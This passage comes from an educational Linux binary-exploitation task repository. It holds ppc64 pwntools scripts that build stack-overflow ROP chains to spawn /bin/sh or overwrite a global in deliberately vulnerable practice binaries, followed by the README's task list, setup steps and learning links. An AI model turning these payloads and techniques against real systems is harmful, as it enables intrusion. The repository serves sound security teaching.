32 | 33 | Breakpoint 2, 0x0000000010000794 in vulnerable () at src/06-system-rop.c:11 34 | 11 } 35 | (gdb) p/x $r1+16 36 | $2 = 0x40007ff9e0 37 | (gdb) c 38 | Continuing. 39 | 40 | Breakpoint 3, 0x00000000100007a0 in vulnerable () at src/06-system-rop.c:11 41 | 11 } 42 | (gdb) i r $r1 43 | r1 0x40007ff9d0 274886293968 44 | (gdb) maintenance print msymbols 45 | ... 46 | [2445] D 0x4000aa5e70 system section .opd 47 | ... 48 | (gdb) x/3gx 0x4000aa5e70 49 | 0x4000aa5e70 : 0x00000040008f7ba0 0x0000004000abc300 50 | 0x4000aa5e80 : 0x0000000000000000 51 | """ 52 | 53 | """ 54 | $ qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -strace ./bin/ppc64/06-system-rop 55 | ... 56 | 29507 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 57 | ... 58 | 29507 mmap(NULL,2381768,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000875000 59 | ... 60 | """ 61 | 62 | """ 63 | $ ropper --nocolor --arch PPC64 --file /usr/powerpc64-linux-gnu/lib/libc-2.27.so 64 | 0x00185b54: ld r2, 0x28(r1); ld r0, 0x80(r1); addi r1, r1, 0x70; mtlr r0; blr; 65 | 0x000ae6a0: ld r0, 0x80(r1); ld r3, 0xa8(r1); mtlr r0; addi r1, r1, 0x70; blr; 66 | """ 67 | 68 | import struct 69 | import sys 70 | 71 | from pwn import * 72 | 73 | context(arch='powerpc64', os='linux', endian='big', word_size=64) 74 | 75 | binary_path = './bin/ppc64/06-system-rop' 76 | libc_path = '/usr/powerpc64-linux-gnu/lib/libc-2.27.so' 77 | 78 | saved_pc_addr = 0x40007ff9e0 79 | buffer_addr = 0x40007ff940 80 | libc_addr = 0x0000004000875000 81 | system_addr = 0x00000040008f7ba0 82 | r2_value = 0x0000004000abc300 83 | 84 | ld_r0_r2_blr_addr = libc_addr + 0x00185b54 85 | ld_r0_r3_blr_addr = libc_addr + 0x000ae6a0 86 | 87 | libc = ELF(libc_path) 88 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 89 | 90 | p = process(binary_path) 91 | #p = gdb.debug([binary_path]) 92 | 93 | payload = '' 94 | payload += 'a' * (saved_pc_addr - buffer_addr) 95 | payload += p64(ld_r0_r2_blr_addr) 96 | # <- $r1 + 24 97 | payload += 'b' * (0x28 - 24) 98 | payload += p64(r2_value) 99 | payload += 'c' * (0x80 - 0x28 - 8) 100 | payload += p64(ld_r0_r3_blr_addr) 101 | # <- $r1 + 24 102 | payload += 'd' * (0x80 - 24) 103 | payload += p64(system_addr) 104 | payload += 'e' * (0xa8 - 0x80 - 8) 105 | payload += p64(bin_sh_addr) 106 | 107 | p.readuntil('> ') 108 | p.write(payload) 109 | p.interactive() 110 | -------------------------------------------------------------------------------- /pwn/ppc64/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000010000794 <+0>: mflr r0 7 | ... 8 | 0x00000000100007f4 <+96>: ld r0,16(r1) 9 | 0x00000000100007f8 <+100>: mtlr r0 10 | 0x00000000100007fc <+104>: ld r31,-8(r1) 11 | 0x0000000010000800 <+108>: blr 12 | 0x0000000010000804 <+112>: .long 0x0 13 | 0x0000000010000808 <+116>: .long 0x1 14 | 0x000000001000080c <+120>: lwz r0,1(r1) 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x100007a8: file src/08-overwrite-global.c, line 9. 18 | (gdb) b *0x00000000100007f4 19 | Breakpoint 2 at 0x100007f4: file src/08-overwrite-global.c, line 14. 20 | (gdb) b *0x0000000010000800 21 | Breakpoint 3 at 0x10000800: file src/08-overwrite-global.c, line 14. 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9 26 | 9 printf("> "); 27 | (gdb) p &buffer[0] 28 | $1 = 0x40007ff930 "" 29 | (gdb) c 30 | Continuing. 31 | 32 | Breakpoint 2, 0x00000000100007f4 in vulnerable () at src/08-overwrite-global.c:14 33 | 14 } 34 | (gdb) p/x $r1+16 35 | $2 = 0x40007ff9d0 36 | (gdb) c 37 | Continuing. 38 | 39 | Breakpoint 3, 0x0000000010000800 in vulnerable () at src/08-overwrite-global.c:14 40 | 14 } 41 | (gdb) i r $r1 42 | r1 0x40007ff9c0 274886293952 43 | (gdb) p not_called 44 | $3 = {void ()} 0x10000810 45 | (gdb) p &x 46 | $4 = (unsigned long *) 0x100200c8 47 | """ 48 | 49 | """ 50 | $ qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -strace ./bin/ppc64/08-overwrite-global 51 | ... 52 | 19379 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 53 | ... 54 | 19379 mmap(NULL,2381768,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000875000 55 | ... 56 | """ 57 | 58 | """ 59 | $ ropper --nocolor --arch PPC64 --inst-count 9 --file /usr/powerpc64-linux-gnu/lib/libc-2.27.so 60 | 0x000eb7b8: ld r31, 0x78(r1); addi r1, r1, 0x80; ld r0, 0x10(r1); mtlr r0; blr; 61 | 0x000ae6a0: ld r0, 0x80(r1); ld r3, 0xa8(r1); mtlr r0; addi r1, r1, 0x70; blr; 62 | 0x001d86dc: addi r1, r1, 0x80; ld r0, 0x10(r1); std r3, 0(r31); ld r31, -8(r1); mtlr r0; blr; 63 | """ 64 | 65 | import struct 66 | import sys 67 | 68 | from pwn import * 69 | 70 | context(arch='powerpc64', os='linux', endian='big', word_size=64) 71 | 72 | binary_path = './bin/ppc64/08-overwrite-global' 73 | 74 | saved_pc_addr = 0x40007ff9d0 75 | buffer_addr = 0x40007ff930 76 | libc_addr = 0x0000004000875000 77 | not_called_addr = 0x10000810 78 | x_addr = 0x100200c8 79 | 80 | ld_r31_addr = libc_addr + 0x000eb7b8 81 | ld_r3_addr = libc_addr + 0x000ae6a0 82 | std_r3_r31_addr = libc_addr + 0x001d86dc 83 | 84 | p = process(binary_path) 85 | #p = gdb.debug([binary_path]) 86 | 87 | payload = '' 88 | payload += 'a' * (saved_pc_addr - buffer_addr) 89 | payload += p64(ld_r31_addr) 90 | 91 | # <- $r1 + 24 92 | payload += 'b' * (0x78 - 24) 93 | payload += p64(x_addr) # r31 94 | payload += 'c' * (0x90 - 0x78 - 8) 95 | payload += p64(ld_r3_addr) # r0 96 | 97 | # <- $r1 + 24 98 | payload += 'e' * (0x80 - 24) 99 | payload += p64(std_r3_r31_addr) # r0 100 | payload += 'c' * (0xa8 - 0x80 - 8) 101 | payload += p64(0xdeadbabebeefc0de) # r3 102 | payload += 'e' * (0x70 + 0x80 - 0xa8 + 8) 103 | 104 | # <- $r1 + 24 - 0x80 105 | payload += p64(not_called_addr) # r0 106 | 107 | p.readuntil('> ') 108 | p.write(payload) 109 | p.interactive() 110 | -------------------------------------------------------------------------------- /pwn/ppc64/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000010000734 <+0>: mflr r0 7 | 0x0000000010000738 <+4>: std r0,16(r1) 8 | ... 9 | 0x0000000010000794 <+96>: ld r0,16(r1) 10 | 0x0000000010000798 <+100>: mtlr r0 11 | 0x000000001000079c <+104>: ld r31,-8(r1) 12 | 0x00000000100007a0 <+108>: blr 13 | 0x00000000100007a4 <+112>: .long 0x0 14 | 0x00000000100007a8 <+116>: .long 0x1 15 | 0x00000000100007ac <+120>: lwz r0,1(r1) 16 | End of assembler dump. 17 | (gdb) b vulnerable 18 | Breakpoint 1 at 0x10000748: file src/07-execve-rop.c, line 6. 19 | (gdb) b *0x0000000010000794 20 | Breakpoint 2 at 0x10000794: file src/07-execve-rop.c, line 11. 21 | (gdb) b *0x00000000100007a0 22 | Breakpoint 3 at 0x100007a0: file src/07-execve-rop.c, line 11. 23 | (gdb) c 24 | Continuing. 25 | 26 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 27 | 6 printf("> "); 28 | (gdb) p &buffer[0] 29 | $1 = 0x40007ff980 "" 30 | (gdb) c 31 | Continuing. 32 | 33 | Breakpoint 2, 0x0000000010000794 in vulnerable () at src/07-execve-rop.c:11 34 | 11 } 35 | (gdb) p/x $r1+16 36 | $2 = 0x40007ffa20 37 | (gdb) c 38 | Continuing. 39 | 40 | Breakpoint 3, 0x00000000100007a0 in vulnerable () at src/07-execve-rop.c:11 41 | 11 } 42 | (gdb) i r $r1 43 | r1 0x40007ffa10 274886294032 44 | (gdb) maintenance print msymbols 45 | ... 46 | [2445] D 0x4000aa5e70 system section .opd 47 | ... 48 | (gdb) x/3gx 0x4000aa5e70 49 | 0x4000aa5e70 : 0x00000040008f7ba0 0x0000004000abc300 50 | 0x4000aa5e80 : 0x0000000000000000 51 | """ 52 | 53 | """ 54 | $ qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -strace ./bin/ppc64/07-execve-rop 55 | ... 56 | 19379 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 57 | ... 58 | 19379 mmap(NULL,2381768,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000875000 59 | ... 60 | """ 61 | 62 | """ 63 | $ ropper --nocolor --arch PPC64 --inst-count 9 --file /usr/powerpc64-linux-gnu/lib/libc-2.27.so 64 | 0x001dd380: ld r0, 0x90(r1); li r5, 0; mtlr r0; addi r1, r1, 0x80; mr r3, r5; ld r31, -8(r1); blr; 65 | 0x0017e2e8: ld r0, 0xa0(r1); ld r4, 0x78(r1); mtlr r0; addi r1, r1, 0x90; ld r3, 8(r31); std r4, 8(r31); ld r31, -8(r1); blr; 66 | 0x000ae6a0: ld r0, 0x80(r1); ld r3, 0xa8(r1); mtlr r0; addi r1, r1, 0x70; blr; 67 | 0x00122230: li r0, 0xb; sc; 68 | """ 69 | 70 | import struct 71 | import sys 72 | 73 | from pwn import * 74 | 75 | context(arch='powerpc64', os='linux', endian='big', word_size=64) 76 | 77 | binary_path = './bin/ppc64/07-execve-rop' 78 | libc_path = '/usr/powerpc64-linux-gnu/lib/libc-2.27.so' 79 | 80 | saved_pc_addr = 0x40007ffa20 81 | buffer_addr = 0x40007ff980 82 | libc_addr = 0x0000004000875000 83 | 84 | li_r5_0_ld_r31_addr = libc_addr + 0x001dd380 85 | ld_r4_addr = libc_addr + 0x0017e2e8 86 | ld_r3_addr = libc_addr + 0x000ae6a0 87 | li_r0_0xb_sc_addr = libc_addr + 0x00122230 88 | 89 | libc = ELF(libc_path) 90 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 91 | 92 | binary = ELF(binary_path) 93 | binary_data_addr = binary.get_section_by_name('.data').header.sh_addr 94 | 95 | p = process(binary_path) 96 | #p = gdb.debug([binary_path]) 97 | 98 | payload = '' 99 | payload += 'a' * (saved_pc_addr - buffer_addr) 100 | payload += p64(li_r5_0_ld_r31_addr) 101 | # <- $r1 + 24 102 | payload += 'b' * (0x80 - 8 - 24) 103 | payload += p64(binary_data_addr) # r31 104 | payload += 'c' * (0x90 - (0x80 - 8) - 8) 105 | payload += p64(ld_r4_addr) # r0 106 | # <- $r1 + 24 107 | payload += 'd' * (0x78 - 24) 108 | payload += p64(0) # r4 109 | payload += 'e' * (0xa0 - 0x78 - 8) 110 | payload += p64(ld_r3_addr) 111 | # <- $r1 + 24 112 | payload += 'f' * (0x80 - 24) 113 | payload += p64(li_r0_0xb_sc_addr) 114 | payload += 'g' * (0xa8 - 0x80 - 8) 115 | payload += p64(bin_sh_addr) 116 | 117 | p.readuntil('> ') 118 | p.write(payload) 119 | p.interactive() 120 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Easy Linux PWN 2 | ============== 3 | 4 | This is a set of Linux binary exploitation tasks for beginners. Right now they are only oriented on stack buffer-overflows. 5 | 6 | I've created these tasks to learn how to do simple binary exploitation on different architectures. 7 | For educational purposes while solving the tasks you have to follow a set of rules listed below. 8 | The tasks are made deliberately small and some of the rules are deliberately unrealistic. 9 | Contrary to most CTF challenges, in these tasks the solution is given to you, you just have to implement it. 10 | 11 | 12 | ## Rules 13 | 14 | 1. All tasks must be solved using the suggested approach even if there are other easier ways. 15 | 16 | 2. All tasks must be solved with specific protections assumed to be enabled or disabled (even if the architecture, the toolchain or the environment doesn't support it). 17 | 18 | 3. All tasks assume a dynamically linked libc with a known binary. 19 | 20 | 4. All ROP chains must be built manually. 21 | 22 | 23 | ## Tasks 24 | 25 | ### Suggested approaches 26 | 27 | 1. [01-local-overflow](src/01-local-overflow.c): 28 | overflow `buffer` and overwrite `x` with the desired value. 29 | 30 | 2. [02-overwrite-ret](src/02-overwrite-ret.c): 31 | overwrite any of the return addresses on stack with the address of `not_called()`. 32 | 33 | 3. [03-one-gadget](src/03-one-gadget.c): 34 | jump to a [one\_gadget](https://github.com/david942j/one_gadget) address. 35 | Make sure to satisfy the required constaints if there are any. 36 | For some of the architectures this might require using a ROP chain, which technically makes "one\_gadget" no longer "one". 37 | 38 | 4. [04-shellcode-static](src/04-shellcode-static.c): 39 | allocate a shellcode on the stack that launches `/bin/sh` and jump to it. 40 | Assume that the shellcode address on the stack is known. 41 | No need to deal with [cache coherency](https://blog.senr.io/blog/why-is-my-perfectly-good-shellcode-not-working-cache-coherency-on-mips-and-arm) on ARM, MIPS and PowerPC. 42 | 43 | 5. [05-shellcode-dynamic](src/05-shellcode-dynamic.c): 44 | same as the previous task, but here the stack address (and therefore the shellcode address on the stack) is unknown. 45 | 46 | 6. [06-system-rop](src/06-system-rop.c): 47 | compose a ROP chain to execute `system("/bin/sh")`. 48 | 49 | 7. [07-execve-rop](src/07-execve-rop.c): 50 | compose a ROP chain to execute `execve("/bin/sh", NULL, NULL)` via a syscall. 51 | Explicitly specify the second and third arguments. 52 | 53 | 8. [08-overwrite-global](src/08-overwrite-global.c): 54 | compose a ROP chain to overwrite `x` with the desired value and then jump to `not_called()`. 55 | 56 | 57 | ### Protections 58 | 59 | Blank spaces mean the protection state is not relevant for the suggested approach. 60 | 61 | | Task | Binary\* | Stack\* | Libc\* | Canary | NX | RELRO | 62 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | 63 | | [01-local-overflow](src/01-local-overflow.c) | | | | No | | | 64 | | [02-overwrite-ret](src/02-overwrite-ret.c) | Known | | Known | No | | | 65 | | [03-one-gadget](src/03-one-gadget.c) | Known | | Known | No | | | 66 | | [04-shellcode-static](src/04-shellcode-static.c) | | Known | | No | No | | 67 | | [05-shellcode-dynamic](src/05-shellcode-dynamic.c) | Known | | Known | No | No | | 68 | | [06-system-rop](src/06-system-rop.c) | Known | | Known | No | | | 69 | | [07-execve-rop](src/07-execve-rop.c) | Known | | Known | No | | | 70 | | [08-overwrite-global](src/08-overwrite-global.c) | Known | | Known | No | | | 71 | 72 | __\*__ - refers to the address of the binary, stack or libc. This allows to specify a more fine-grained control than traditional ASLR/PIE. 73 | 74 | To disable ALSR: 75 | 76 | ``` bash 77 | echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 78 | ``` 79 | 80 | To enable ASLR: 81 | 82 | ``` bash 83 | echo 2 | sudo tee /proc/sys/kernel/randomize_va_space 84 | ``` 85 | 86 | 87 | ## Solutions 88 | 89 | These solutions are provided only for reference and are not portable (they contain hardcoded addresses and offsets and were only tested in a single environment). 90 | 91 | | Task | x86 | x86-64 | arm | arm64 | mips | mips64 | ppc | ppc64 | sparc64 | 92 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | 93 | | [01-local-overflow](src/01-local-overflow.c) | [+](pwn/x86/01-local-overflow.py) | [+](pwn/x86-64/01-local-overflow.py) | [+](pwn/arm/01-local-overflow.py) | [+](pwn/arm64/01-local-overflow.py) | [+](pwn/mips/01-local-overflow.py) | [+](pwn/mips64/01-local-overflow.py) | [+](pwn/ppc/01-local-overflow.py) | [+](pwn/ppc64/01-local-overflow.py) | [+](pwn/sparc64/01-local-overflow.py) | 94 | | [02-overwrite-ret](src/02-overwrite-ret.c) | [+](pwn/x86/02-overwrite-ret.py) | [+](pwn/x86-64/02-overwrite-ret.py) | [+](pwn/arm/02-overwrite-ret.py) | [+](pwn/arm64/02-overwrite-ret.py) | [+](pwn/mips/02-overwrite-ret.py) | [+](pwn/mips64/02-overwrite-ret.py) | [+](pwn/ppc/02-overwrite-ret.py) | [+](pwn/ppc64/02-overwrite-ret.py) | [+](pwn/sparc64/02-overwrite-ret.py) | 95 | | [03-one-gadget](src/03-one-gadget.c) | [+](pwn/x86/03-one-gadget.py) | [+](pwn/x86-64/03-one-gadget.py) | | [+](pwn/arm64/03-one-gadget.py) | | | | | | 96 | | [04-shellcode-static](src/04-shellcode-static.c) | [+](pwn/x86/04-shellcode-static.py) | [+](pwn/x86-64/04-shellcode-static.py) | [+](pwn/arm/04-shellcode-static.py) | [+](pwn/arm64/04-shellcode-static.py) | [+](pwn/mips/04-shellcode-static.py) | [+](pwn/mips64/04-shellcode-static.py) | [+](pwn/ppc/04-shellcode-static.py) | [+](pwn/ppc64/04-shellcode-static.py) | | 97 | | [05-shellcode-dynamic](src/05-shellcode-dynamic.c) | [+](pwn/x86/05-shellcode-dynamic.py) | [+](pwn/x86-64/05-shellcode-dynamic.py) | [+](pwn/arm/05-shellcode-dynamic.py) | [+](pwn/arm64/05-shellcode-dynamic.py) | [+](pwn/mips/05-shellcode-dynamic.py) | [+](pwn/mips64/05-shellcode-dynamic.py) | [+](pwn/ppc/05-shellcode-dynamic.py) | | | 98 | | [06-system-rop](src/06-system-rop.c) | [+](pwn/x86/06-system-rop.py) | [+](pwn/x86-64/06-system-rop.py) | [+](pwn/arm/06-system-rop.py) | [+](pwn/arm64/06-system-rop.py) | [+](pwn/mips/06-system-rop.py) | [+](pwn/mips64/06-system-rop.py) | [+](pwn/ppc/06-system-rop.py) | [+](pwn/ppc64/06-system-rop.py) | | 99 | | [07-execve-rop](src/07-execve-rop.c) | [+](pwn/x86/07-execve-rop.py) | [+](pwn/x86-64/07-execve-rop.py) | [+](pwn/arm/07-execve-rop.py) | [+](pwn/arm64/07-execve-rop.py) | [+](pwn/mips/07-execve-rop.py) | [+](pwn/mips64/07-execve-rop.py) | [+](pwn/ppc/07-execve-rop.py) | [+](pwn/ppc64/07-execve-rop.py) | | 100 | | [08-overwrite-global](src/08-overwrite-global.c) | [+](pwn/x86/08-overwrite-global.py) | [+](pwn/x86-64/08-overwrite-global.py) | [+](pwn/arm/08-overwrite-global.py) | [+](pwn/arm64/08-overwrite-global.py) | [+](pwn/mips/08-overwrite-global.py) | [+](pwn/mips64/08-overwrite-global.py) | [+](pwn/ppc/08-overwrite-global.py) | [+](pwn/ppc64/08-overwrite-global.py) | | 101 | 102 | 103 | ## Prerequisites 104 | 105 | The tasks were tested on x86-64 CPU machine with Linux Mint 19.1 and the following software versions: 106 | 107 | | Software | Version | 108 | | :---: | :---: | 109 | | GCC | (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0 | 110 | | glibc | (Ubuntu GLIBC 2.27-3ubuntu1) 2.27 | 111 | | QEMU | 2.11.1(Debian 1:2.11+dfsg-1ubuntu7.12) | 112 | | GDB | (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git | 113 | | pwntools | 3.12.2 | 114 | | Ropper | 1.11.13 | 115 | 116 | Issues: 117 | 118 | 1. `qemu-ppc64` requires a newer QEMU (with [this](https://patchwork.kernel.org/patch/10243489/) patch), so you'll need to build QEMU from source. 119 | If the manually built QEMU doesn't know where to look for dynamic libs, run `export QEMU_LD_PREFIX=/etc/qemu-binfmt/ppc64/` before using `pwntools`. 120 | 121 | 2. `ropper` has poor support for `ppc` and `ppc64`, so [this](https://github.com/sashs/Ropper/pull/98) patch is recommended to recognize more gadgets. 122 | 123 | 3. `ropper` doesn't recognize `ppc64` binaries automatically and requires [this](https://github.com/sashs/Ropper/pull/100) patch (you may also explicitly provide `--arch PPC64`). 124 | 125 | 4. `pwntools` doesn't set arch name for GDB for `sparc64` correctly and requires [this](https://github.com/Gallopsled/pwntools/pull/1292) patch. 126 | 127 | 5. `ropper` (nor `ROPgadget`) doesn't support `sparc64` and requires [this](https://github.com/sashs/Ropper/pull/101) patch. 128 | 129 | 130 | ### Setup 131 | 132 | Install packages: 133 | 134 | ``` bash 135 | sudo apt-get install build-essential 136 | sudo apt-get install gcc-arm-linux-gnueabihf gcc-aarch64-linux-gnu gcc-mips-linux-gnu gcc-mips64-linux-gnuabi64 gcc-powerpc-linux-gnu gcc-powerpc64-linux-gnu gcc-sparc64-linux-gnu 137 | sudo apt-get install libc6-dev:i386 libc6-armhf-cross libc6-arm64-cross libc6-mips-cross libc6-mips64-cross libc6-powerpc-cross libc6-ppc64-cross libc6-sparc64-cross 138 | sudo apt-get install qemu-user 139 | sudo apt-get install gdb gdb-multiarch 140 | 141 | # These are probably not required, but just in case: 142 | # sudo apt-get install gcc-7-multilib gcc-multilib-arm-linux-gnueabi gcc-multilib-mips-linux-gnu gcc-multilib-mips64-linux-gnuabi64 gcc-multilib-powerpc-linux-gnu gcc-multilib-powerpc64-linux-gnu 143 | ``` 144 | 145 | Build the binaries: 146 | 147 | ``` bash 148 | ./build.sh 149 | ``` 150 | 151 | Install pwntools and ropper (assuming that you have `pip` installed): 152 | 153 | ``` bash 154 | pip install --user pwntools ropper 155 | ``` 156 | 157 | Setup `qemu-binfmt` for QEMU and pwntools: 158 | 159 | ``` bash 160 | sudo mkdir /etc/qemu-binfmt 161 | sudo ln -s /usr/arm-linux-gnueabihf/ /etc/qemu-binfmt/arm 162 | sudo ln -s /usr/aarch64-linux-gnu /etc/qemu-binfmt/aarch64 163 | sudo ln -s /usr/mips-linux-gnu/ /etc/qemu-binfmt/mips 164 | sudo ln -s /usr/mips64-linux-gnuabi64/ /etc/qemu-binfmt/mips64 165 | sudo ln -s /usr/powerpc-linux-gnu/ /etc/qemu-binfmt/ppc 166 | sudo ln -s /usr/powerpc64-linux-gnu/ /etc/qemu-binfmt/ppc64 167 | sudo ln -s /usr/sparc64-linux-gnu/ /etc/qemu-binfmt/sparc64 168 | ``` 169 | 170 | 171 | ### More 172 | 173 | In case you want to run the binaries and QEMU manually: 174 | 175 | ``` bash 176 | gdbserver --no-disable-randomization localhost:1234 ./bin/x86/00-hello-pwn 177 | gdbserver --no-disable-randomization localhost:1234 ./bin/x86-64/00-hello-pwn 178 | qemu-arm -L /usr/arm-linux-gnueabihf/ -g 1234 ./bin/arm/00-hello-pwn 179 | qemu-aarch64 -L /usr/aarch64-linux-gnu/ -g 1234 ./bin/arm64/00-hello-pwn 180 | qemu-mips -L /usr/mips-linux-gnu/ -g 1234 ./bin/mips/00-hello-pwn 181 | qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -g 1234 ./bin/mips64/00-hello-pwn 182 | qemu-ppc -L /usr/powerpc-linux-gnu/ -g 1234 ./bin/ppc/00-hello-pwn 183 | qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -g 1234 ./bin/ppc64/00-hello-pwn 184 | qemu-sparc64 -L /usr/sparc64-linux-gnu/ -g 1234 ./bin/sparc64/00-hello-pwn 185 | ``` 186 | 187 | ``` bash 188 | gdb -q -ex "set architecture i386" -ex "set solib-search-path /lib/i386-linux-gnu/" -ex "target remote localhost:1234" ./bin/x86/00-hello-pwn 189 | gdb -q -ex "target remote localhost:1234" ./bin/x86-64/00-hello-pwn 190 | gdb-multiarch -q -ex "set architecture arm" -ex "set solib-absolute-prefix /usr/arm-linux-gnueabihf/" -ex "target remote localhost:1234" ./bin/arm/00-hello-pwn 191 | gdb-multiarch -q -ex "set architecture aarch64" -ex "set solib-absolute-prefix /usr/aarch64-linux-gnu/" -ex "target remote localhost:1234" ./bin/arm64/00-hello-pwn 192 | gdb-multiarch -q -ex "set architecture mips" -ex "set solib-absolute-prefix /usr/mips-linux-gnu/" -ex "target remote localhost:1234" ./bin/mips/00-hello-pwn 193 | gdb-multiarch -q -ex "set architecture mips64" -ex "set solib-absolute-prefix /usr/mips64-linux-gnuabi64/" -ex "target remote localhost:1234" ./bin/mips64/00-hello-pwn 194 | gdb-multiarch -q -ex "set architecture powerpc:common" -ex "set solib-absolute-prefix /usr/powerpc-linux-gnu/" -ex "target remote localhost:1234" ./bin/ppc/00-hello-pwn 195 | gdb-multiarch -q -ex "set architecture powerpc:common64" -ex "set solib-absolute-prefix /usr/powerpc64-linux-gnu/" -ex "target remote localhost:1234" ./bin/ppc64/00-hello-pwn 196 | gdb-multiarch -q -ex "set architecture sparc:v9" -ex "set solib-absolute-prefix /usr/sparc64-linux-gnu/" -ex "target remote localhost:1234" ./bin/sparc64/00-hello-pwn 197 | ``` 198 | 199 | If you want to do full system emulation, you can do that either manually via `qemu-system-*` or via [arm_now](https://github.com/nongiach/arm_now). 200 | 201 | 202 | ## Materials 203 | 204 | I'm not aiming to provide a thoroughly collected list of materials to learn binary exploitation here, so for the most part you should rely on your own ability to find them. 205 | I'll still put here some links that I have found helpful. 206 | 207 | [Linux syscall tables](https://w3challs.com/syscalls/) 208 | 209 | ### x86 and x86-64 210 | 211 | Countless tutorials available online for these architectures. 212 | 213 | ### arm 214 | 215 | [INTRODUCTION TO ARM ASSEMBLY BASICS](https://azeria-labs.com/writing-arm-assembly-part-1/) [articles] 216 | 217 | [ARM shellcode and exploit development](https://github.com/invictus1306/Workshop-BSidesMunich2018/blob/master/workshop_slides.pdf) [slides] 218 | 219 | ### arm64 220 | 221 | [ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile](https://static.docs.arm.com/ddi0487/b/DDI0487B_a_armv8_arm.pdf) [book] 222 | 223 | [Introduction to A64 Instruction Set](https://blog.linuxplumbersconf.org/2014/ocw//system/presentations/2361/original/02%20-%20a64-isa-intro-final.pdf) [slides] 224 | 225 | [ROP-ing on Aarch64 - The CTF Style](https://blog.perfect.blue/ROPing-on-Aarch64) [article] 226 | 227 | [GoogleCTF - forced-puns](https://0xabe.io/ctf/exploit/2016/05/02/GoogleCTF-forced-puns.html) [article] 228 | 229 | ### mips 230 | 231 | [MIPS IV Instruction Set](http://math-atlas.sourceforge.net/devel/assembly/mips-iv.pdf) [book] 232 | 233 | [MIPS Calling Convention](https://courses.cs.washington.edu/courses/cse410/09sp/examples/MIPSCallingConventionsSummary.pdf) [article] 234 | 235 | [EXPLOITING BUFFER OVERFLOWS ON MIPS ARCHITECTURES](https://www.vantagepoint.sg/papers/MIPS-BOF-LyonYang-PUBLIC-FINAL.pdf) [article] 236 | 237 | [Exploiting a MIPS Stack Overflow](http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/) [article] 238 | 239 | Notes: 240 | 241 | 1. `mips` has branch delay slot. 242 | 243 | ### mips64 244 | 245 | [MIPS64 Architecture For Programmers Volume II: The MIPS64 Instruction Set](https://scc.ustc.edu.cn/zlsc/lxwycj/200910/W020100308600769158777.pdf) [book] 246 | 247 | [Linux MIPS ELF reverse engineering tips](https://www.cr0.org/paper/mips.elf.external.resolution.txt) [article] 248 | 249 | Notes: 250 | 251 | 1. `mips64` has branch delay slot. 252 | 253 | 2. Functions expect to be called through `$t9`. 254 | 255 | ### ppc 256 | 257 | [PowerPC User Instruction Set Architecture Book I Version 2.01](http://math-atlas.sourceforge.net/devel/assembly/ppc_isa.pdf) [book] 258 | 259 | [POWERPC FUNCTION CALLING CONVENTION](https://g4laad.re/part-6-powerpc-stack-and-function/) [article] 260 | 261 | [Router Exploitation](https://www.recurity-labs.com/research/FX_Router_Exploitation.pdf) [slides] 262 | 263 | [CVE-2017-3881 Cisco Catalyst RCE Proof-Of-Concept](https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/) [article] 264 | 265 | [How To Cook Cisco](https://embedi.org/blog/how-cook-cisco/) [article] 266 | 267 | ### ppc64 268 | 269 | [PowerPC User Instruction Set Architecture Book I Version 2.01](http://math-atlas.sourceforge.net/devel/assembly/ppc_isa.pdf) [book] 270 | 271 | [64-bit PowerPC ELF Application Binary Interface Supplement 1.9](https://refspecs.linuxfoundation.org/ELF/ppc64/PPC-elf64abi-1.9.html) [article] 272 | 273 | [Deeply understand 64-bit PowerPC ELF ABI - Function Descriptors](https://www.ibm.com/developerworks/community/blogs/5894415f-be62-4bc0-81c5-3956e82276f3/entry/deeply_understand_64_bit_powerpc_elf_abi_function_descriptors?lang=en) [article] 274 | 275 | Notes: 276 | 277 | 1. Functions expect a correct value of `$r2` when called. 278 | 279 | ### sparc 280 | 281 | [The SPARC Architecture Manual Version 8](https://www.gaisler.com/doc/sparcv8.pdf) [book] 282 | 283 | [Function Call and Return in SPARC combined with Sliding Register Windows](http://www.mathcs.emory.edu/~cheung/Courses/255/Syllabus/8-SPARC/func-call+ret.html) [article] 284 | 285 | [When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC](https://hovav.net/ucsd/dist/sparc.pdf) [paper] 286 | 287 | [Buffer Overflows On the SPARC Architecture](http://www.davidlitchfield.com/sparc_buffer_overflows.pdf) [article] 288 | 289 | ### sparc64 290 | 291 | [The SPARC Architecture Manual Version 9](https://cr.yp.to/2005-590/sparcv9.pdf) [book] 292 | 293 | [SPARC V9 ABI Features](https://docs.oracle.com/cd/E19120-01/open.solaris/816-5138/advanced-2/index.html) [article] 294 | 295 | Notes: 296 | 297 | 1. `sparc64` has branch delay slot. 298 | 299 | 2. 